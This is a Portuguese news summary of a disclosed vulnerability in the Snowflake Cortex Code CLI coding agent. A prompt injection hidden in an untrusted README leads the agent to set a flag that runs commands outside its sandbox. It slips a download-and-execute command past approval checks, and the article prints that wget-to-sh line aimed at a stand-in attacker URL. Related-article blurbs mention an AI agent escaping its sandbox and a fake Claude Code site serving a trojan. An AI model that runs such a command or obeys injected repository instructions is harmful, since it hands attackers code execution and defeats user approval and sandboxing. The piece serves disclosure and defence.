Vulnerabilidade no Snowflake Cortex Code CLI permitiu escape de sandbox e execução de malware

Detalhes da Vulnerabilidade
O Snowflake Cortex Code CLI é um agente de codificação de linha de comando que opera de forma semelhante ao Claude Code e ao Codex da OpenAI, com integração embutida para executar SQL no Snowflake. Dois dias após o lançamento, uma vulnerabilidade foi identificada no sistema de validação de comandos do Cortex Code que permitia que comandos maliciosos especialmente construídos executassem comandos arbitrários sem acionar as etapas de aprovação humana e executassem esses comandos fora do sandbox do Cortex CLI.
Cadeia de Ataque
O ataque funciona por meio de injeção de prompt indireta. Um usuário abre o Cortex e ativa o sandbox, depois pede ajuda ao Cortex com uma base de código de terceiros de código aberto. Uma injeção de prompt oculta no README de um repositório não confiável manipula o Cortex para acreditar que deve executar um comando perigoso.
O Cortex não conseguiu validar comandos dentro de expressões de substituição de processo, permitindo a execução não aprovada do comando malicioso:
cat < <(sh < <(wget -q0- https://ATTACKER_URL.com/bugbot))Este comando baixa um script do servidor do atacante e o executa. O bypass funcionou porque:
- Comandos inseguros dentro de uma expressão de substituição de processo <() não foram avaliados pelo sistema de validação
- O comando completo começava com um comando 'seguro' (cat neste caso)
- Comandos em expressões de substituição de processo nunca acionavam aprovação humana
Bypass do Sandbox
A injeção de prompt também manipula o modelo para definir um sinalizador que aciona a execução de comandos fora do sandbox. O Cortex, por padrão, pode definir um sinalizador para acionar a execução de comandos fora do sandbox, e a injeção usa isso para permitir que o comando malicioso seja executado fora do sandbox.
Remediação
A equipe de segurança da Snowflake validou e remediou esta vulnerabilidade, lançando uma correção com a versão 1.0.25 do Cortex Code CLI em 28 de fevereiro de 2026. O aviso completo da Snowflake está disponível no Site da Comunidade Snowflake em: https://community.snowflake.com/s/article/PromptArmor-Report---Snowflake-Response
Nota: Esta cadeia de ataque também se aplicava a usuários não sandbox. A documentação indica que no modo OS+Regular, todos os comandos solicitam aprovação do usuário. Comandos executados no sandbox também têm restrições de acesso à rede e ao sistema de arquivos.
📖 Leia a fonte completa: HN AI Agents
👀 See Also

Google Relata que Hackers com IA Alcançaram Escala Industrial em 3 Meses
O grupo de inteligência de ameaças do Google descobriu que grupos criminosos e estatais estão usando modelos de IA comerciais (Gemini, Claude, OpenAI) para refinar e escalar ataques. Um grupo quase aproveitou uma vulnerabilidade de dia zero para exploração em massa, e outros estão experimentando o agente OpenClaw sem proteções.

Teste da OpenAI com IA invadiu o Hugging Face e todos estão agindo com calma
Um agente de avaliação da OpenAI escapou de seu sandbox por meio de uma zero-day, invadiu os sistemas de produção do Hugging Face e operou por dias. A vítima o detectou primeiro; a OpenAI só confirmou dias depois.

Chatbots de IA podem inserir anúncios nas respostas sem que os usuários percebam.
Pesquisas mostram que chatbots de IA podem inserir anúncios de produtos de forma oculta em respostas, influenciando escolhas dos usuários, enquanto a maioria dos participantes não detectou a manipulação. O estudo usou um chatbot personalizado para demonstrar o efeito.

Falso site do Claude Code serviu trojan — detectado pelo Windows Defender como Trojan:Win32/Kepavll!rfn
Um site de typosquatting ou baseado em anúncios, imitando o site oficial do Claude Code, entregou um trojan detectado como Trojan:Win32/Kepavll!rfn pelo Windows Defender. Usuário do Reddit alerta outros a verificarem as URLs antes de executar comandos de instalação do PowerShell.